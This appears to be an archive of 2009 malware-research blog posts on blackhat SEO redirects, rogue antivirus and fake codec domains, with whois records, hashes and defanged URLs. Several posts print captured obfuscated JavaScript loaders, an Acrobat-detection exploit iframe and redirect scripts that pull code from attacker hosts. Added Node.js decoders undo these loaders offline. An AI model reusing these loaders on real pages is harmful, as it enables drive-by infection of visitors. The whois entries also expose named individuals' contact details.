Archive for the 'Blackhat SEO' Category

05
Jul

Blackhat SEO campaign with domains flooding search results-UPDATED

There is a blackhat SEO campaign redirecting users to fake scanning websites in order to infect them. Each of these domains hosts many pages stuffed with keywords to rank highly in search results. Once a result is clicked, the user is redirected to the drive-by download site of the day. You can click on each domain name to view the whois information. Here is a list of some of the domains, as well as how the redirect works.

<script type="text/javascript" src="/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoVCp_qCODoee2QvAwsxetjrz1uKFNY2brg"></script>

The following JavaScript is then loaded:

var t3dbj5es5;
if (typeof(encodeURIComponent) == 'function') t3dbj5es5 = encodeURIComponent;
else if (typeof(escape) == 'function') t3dbj5es5 = escape;
else t3dbj5es5 = function (text) { return text; };
document.write('<script src="http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=' + (document.referrer ? t3dbj5es5(document.referrer) : '') + '" type="text/javascript"></script>');

The contents of the new page are below.

document.location.href='http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1';

Redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
Redirects to
Fake scanning page of the day, as selected by the malware distributors.


UPDATED: 7/5/09


17
Jun

Adobe exploit page installs malware updatedb87.cn & nicevideo15.com

This domain exploits vulnerabilities in Adobe software to install malware on a victim's computer. The exploit runs quietly, and the user is none the wiser. It is triggered by a search referrer.

WARNING: URLs may still be active. VERY DANGEROUS. Proceed at your own risk.

hxxp://updatedb87.cn/out/index.php

function load(code,dfunc,anticasp)
{
eval(dfunc);
decrypt(code);
}
load('<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx;;\'F(5Qi(~8/.hY;S\'Q;`Y(i9.FZF"><;`B15ni>',
unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));

Deobfuscates to

<iframe frameBorder="0" scrolling="no" width="1" height="1" src="http://updatedb87.cn/out/index.php"></iframe>
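
The substitution scheme above can be undone without running the page's code. The following Node.js sketch is an added example, not part of the original post: it reads the alphabet out of the percent-encoded decrypt() source and reverses the mapping offline. The function names are this example's own, and the wrap-around for the first key character is an assumption.

```javascript
// Static decoder for the loader above: recovers the hidden markup without
// eval() or document.write(). Both inputs are copied from the sample on this page.
const PAYLOAD =
  '<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx' +
  ';;\'F(5Qi(~8/.hY;S\'Q;`Y(i9.FZF"><;`B15ni>';
const DECRYPTOR =
  'function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb' +
  '%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md' +
  '%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29' +
  '%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind' +
  '%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write' +
  '%28q%29%7D';

// Pull the substitution alphabet out of the percent-encoded decrypt() source.
function extractKey(encodedSource) {
  const source = decodeURIComponent(encodedSource);
  const m = /key\s*=\s*"((?:[^"\\]|\\.)*)"/.exec(source);
  if (!m) throw new Error('no key literal found in decryptor source');
  return m[1].replace(/\\(.)/g, '$1'); // resolve JS escapes such as \'
}

// Each character found in the key maps to the key character one position
// earlier; anything not in the key passes through unchanged.
function decodeSubstitution(text, key) {
  let out = '';
  for (const ch of text) {
    const i = key.indexOf(ch);
    if (i === -1) out += ch;
    // The sample hard-codes index 79 for the first key character; wrapping to
    // the key's last character is this example's assumption, and the payload
    // never exercises it.
    else out += key[(i - 1 + key.length) % key.length];
  }
  return out;
}

// List src= targets of iframe/script tags in the decoded markup, defanged.
function hiddenSources(markup) {
  const re = /<(?:iframe|script)\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  return [...markup.matchAll(re)].map((m) => m[1].replace(/^http/i, 'hxxp'));
}

function analyze(payload = PAYLOAD, decryptor = DECRYPTOR) {
  const key = extractKey(decryptor);
  const markup = decodeSubstitution(payload, key);
  return { key, markup, sources: hiddenSources(markup) };
}

console.log(analyze());
```
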

This iframe contains the following code, which uses a malicious PDF file to install malware on the system.

<script>
function pdf_gen2()
{
    var detectAcrobat = false;
    try
    {
        if( navigator.plugins && navigator.mimeTypes.length)
        {
            for( var i = 0; i < navigator.plugins.length; i++)
            {
                var name = navigator.plugins[i].name;
                if( name.indexOf('Adobe Acrobat') != -1)
                {
                    detectAcrobat = true;
                    break;
                }
            }
        }
        else
        {
            var obj = null;
            obj = new ActiveXObject("AcroPDF.PDF");
            if( !obj) obj = new ActiveXObject("PDF.PdfCtrl");
            if( obj) detectAcrobat = true;
        }
    }
    catch(e)
    {
    }
    if( detectAcrobat)
    {
        document.write('<iframe src="pdf.php"></iframe>');
    }
    else return false;
}
pdf_gen2();
</script>

All have been added to our database.

update.exe
Result: 17/41 (41.47%)
MD5: bcb016582e40e6312f7bf742c0dfcedd
VirusTotal
ThreatExpert Analysis
hxxp://updatedb87.cn/out/load.php?id=0

pdrv.exe or stron_1245063771.exe
Result: 6/41 (14.64%)
MD5: ca557e7460c222ef90e9d36881f6ac53
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

update_936.pdf
Result: 6/41 (14.64%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
Wepawet Analysis
hxxp://updatedb87.cn/out/pdf.php

pp.10.exe
Result: 15/41 (36.59%)
MD5: d23ad273d30ad73edfac5afddf5e6550
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

The page will also lead the user to a website that says the victim needs to install AdobeViewer and starts a download.

Whois entry for nicevideo15.com 94.232.248.70
Konstantin Berdeev
Email: camelot1984@gmail.com
Organization: Private person
Address: Moskva, m. Leninskoe, d. 192
City: Moskva
State: Moskvoskaya
ZIP: 174633
Country: RU
Phone: +7.4953996729
Fax: +7.49599672913



Setup.exe
Result: 10/41 (24.4%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
ThreatExpert Analysis
hxxp://nicevideo15.com/software/f75b610c1c/14250/1/

10
Jun

New codec domains: exe-file-boom.com & hi-my-tube.com

Found these domains spreading a fake codec today. Both were registered today.

Whois entry for exe-file-boom.com 66.197.171.6
Isaac Donnelly (isaacdonn@gmail.com)
3711 Eastland Avenue
Hattiesburg
Mississippi,39402
US
Tel. +001.88795890983


exe-file-boom.com
my-exe-profile.com
web-exe-depositary.com
mp3downloadablesongs.com

Whois entry for hi-my-tube.com 216.240.143.7
Stephine Smith (stsmisss@gmail.com)
2810 Kovar Road
Westboro
Maine,01581
US
Tel. +001.76778989543



streamviewer.40014.exe
Result: 9/40 (22.5%)
MD5: 78a3631fbc7d93ce07c33233416a2176
VirusTotal
ThreatExpert Analysis
hxxp://exe-file-boom.com/streamviewer.40014.exe

a.exe
Result: 11/39 (28.21%)
MD5: 2e326fd4048bdf28308a9bb5ced08ed7
VirusTotal
ThreatExpert Analysis
hxxp://thenewpic.com/item/a5acc232141aba8b24603e1b24eb084d0e020a6c16c76e38e6582142a6c4df427ca48b89cc4e0cf0a/4400d031142/titem.gif

b.exe or msa.exe
Result: 5/39 (12.83%)
MD5: c665052347ce07a9626c6cdcdb0e56d8
VirusTotal
ThreatExpert Analysis
hxxp://theimagesphoto.com/werber/04d04071f42/217.gif

09
Jun

New rogue domain: ourbestsecurityshield.com

New rogue domain found today.

Whois entry for ourbestsecurityshield.com 209.44.126.241
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676


install.exe (System Security 2009)
Result: 12/40 (30%)
MD5: bfb22174402c3123915a8bb7b019aba1
VirusTotal
ThreatExpert Analysis
hxxp://ourbestsecurityshield.com/download.php?affid=08045

05
Jun

New rogue domain: pro-antivirus.net

Another rogue domain registered today to spread rogue anti-malware programs.

Whois entry for pro-antivirus.net 64.213.140.71
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

viruscatcher.net also is associated with this IP address.

Setup_build6_1003599.exe (Malware Catcher 2009)
Result: 9/40 (22.5%)
MD5: 3ca68a7d36ec198da766be580333099e
VirusTotal
ThreatExpert Analysis
hxxp://pro-antivirus.net/build6_1003599.php?cmd=getFile&counter=2&p=WKmimHVlaGmUYp2fV5GPlqR1sXCjhHOuU8%2FXoGddoami2NmRglqbnZxxmpiqcpo%3D

03
Jun

Another domain redirecting to rogues using macrosoftwarego.com

Yet another domain is associated with the string of blackhat SEO operations using macrosoftwarego.com, covered in my previous posts #1 and #2.

The page reached from the search results contains the following JavaScript routine.

var str=["762", "777", "770", "759", "776", "765", "771", "770", "692", "743",
"761", "770", "760", "737", "781", "700", "773", "777", "761", "774", "781", "701",
"783", "670", "692", "779", "765", "770", "760", "771", "779", "706", "768", "771",
"759", "757", "776", "765", "771", "770", "721", "699", "764", "776", "776", "772",
"718", "707", "707", "759", "757", "768", "768", "771", "779", "755", "769", "771",
"770", "776", "774", "761", "757", "768", "711", "711", "706", "757", "762", "765",
"774", "775", "776", "760", "765", "758", "775", "706", "759", "771", "769", "707",
"765", "770", "760", "761", "780", "706", "764", "776", "769", "768", "723", "742",
"761", "762", "721", "699", "703", "761", "770", "759", "771", "760", "761", "745",
"742", "733", "727", "771", "769", "772", "771", "770", "761", "770", "776", "700",
"760", "771", "759", "777", "769", "761", "770", "776", "706", "774", "761", "762",
"761", "774", "774", "761", "774", "701", "719", "670", "785"];
var temp='';
var gg='';
for (i=0; i<str.length; i++){
gg=str[i]-660;
temp=temp+String.fromCharCode(gg);
}
eval(temp);

DECODES TO:

function SendMy(query){
window.location='http://callow_montreal33.afirstdibs.com/index.html?Ref='+encodeURIComponent(document.referrer);
}

If the referrer is one of certain search engines, you will then be redirected to macrosoftwarego.com and then on to the appropriate rogue anti-malware website for a drive-by download.
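
An added example (not from the original post) that decodes this kind of numeric-array loader without calling eval: it recovers the subtraction constant from the data itself and flags the referrer-forwarding redirect. The function names are this example's own; the number list is copied from the routine above.

```javascript
// Offline decoder for "numbers minus a constant" loaders. Nothing is eval()'d.
// STR is the array from the routine above, flattened into one string.
const STR = `762 777 770 759 776 765 771 770 692 743
761 770 760 737 781 700 773 777 761 774 781 701
783 670 692 779 765 770 760 771 779 706 768 771
759 757 776 765 771 770 721 699 764 776 776 772
718 707 707 759 757 768 768 771 779 755 769 771
770 776 774 761 757 768 711 711 706 757 762 765
774 775 776 760 765 758 775 706 759 771 769 707
765 770 760 761 780 706 764 776 769 768 723 742
761 762 721 699 703 761 770 759 771 760 761 745
742 733 727 771 769 772 771 770 761 770 776 700
760 771 759 777 769 761 770 776 706 774 761 762
761 774 774 761 774 701 719 670 785`.trim().split(/\s+/).map(Number);

const printable = (c) => c === 9 || c === 10 || c === 13 || (c >= 32 && c <= 126);

// Try every constant that could map the smallest and largest value into
// ASCII, and keep those for which every decoded character is printable.
function candidateOffsets(values) {
  const lo = Math.min(...values);
  const hi = Math.max(...values);
  const found = [];
  for (let off = hi - 126; off <= lo - 9; off++) {
    if (values.every((v) => printable(v - off))) found.push(off);
  }
  return found;
}

function decode(values, offset) {
  return String.fromCharCode(...values.map((v) => v - offset));
}

// Report what the hidden script does instead of running it.
function triage(values) {
  const offsets = candidateOffsets(values);
  if (offsets.length === 0) throw new Error('no single-constant decoding found');
  const offset = offsets[0];
  const code = decode(values, offset);
  const urls = code.match(/https?:\/\/[^\s'"<>)]+/g) || [];
  const hosts = urls.map((u) => /^https?:\/\/([^\/?#:]+)/.exec(u)[1]);
  return {
    offsets,
    offset,
    code,
    hosts,
    // True when the script redirects and passes the search referrer along.
    forwardsReferrer: /location/.test(code) && /document\.referrer/.test(code),
  };
}

console.log(triage(STR));
```
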

Whois entry for afirstdibs.com 84.16.229.43
Smith
Kevin L (KevinLSmith@text2re.com)
3924 Chathamway
Washington
Gansu,20200
CN
Tel. +240.5484495

02
Jun

New rogue domain: hidef-porn-movies.com

Another domain found distributing malware codecs and rogue anti-malware programs. The referrer in this case was through y0utybe.com.

Whois entry for hidef-porn-movies.com 91.212.132.11
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676



/promo1/ – Fake Adult-Archive.net page
/promo2/ – Fake PornTube page
/promo3/ – Fake scan page
/promo4/ – Fake SexTube page

Whois entry for y0utybe.com 216.195.60.231
Whois Privacy Protection Service
Whois Agent suqkgszqlv@whoisservices.cn
+86.05922577888 fax: +86.05922577111
Xiamen Software Park shengshi Building
xiamen fujian 361005
china

softname.exe
Result: 16/40 (40%)
MD5: aa33e33a6d0a650958c3fa0d1333d9f3
VirusTotal
ThreatExpert Analysis
hxxp://hidef-porn-movies.com/promo2/get.php?aid=1226&vname=softname

02
Jun

New rogue domain: personal-antivirus-software.com

Here we go with more rogue anti-malware spreading domains.

Whois entry for personal-antivirus-software.com 91.212.132.12
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676



/promo1/ – Fake Adult-Archive.net page
/promo2/ – Fake PornTube page
/promo3/ – Fake scan page
/promo4/ – Fake SexTube page

antivirus.exe (Rogue: Privacy Center)
Result: 17/40 (42.5%)
MD5: bf309c72230badc849d45f26e78b6a3e
VirusTotal
ThreatExpert Analysis
hxxp://personal-antivirus-software.com/promo3/get.php?aid=1361&vname=antivirus






 
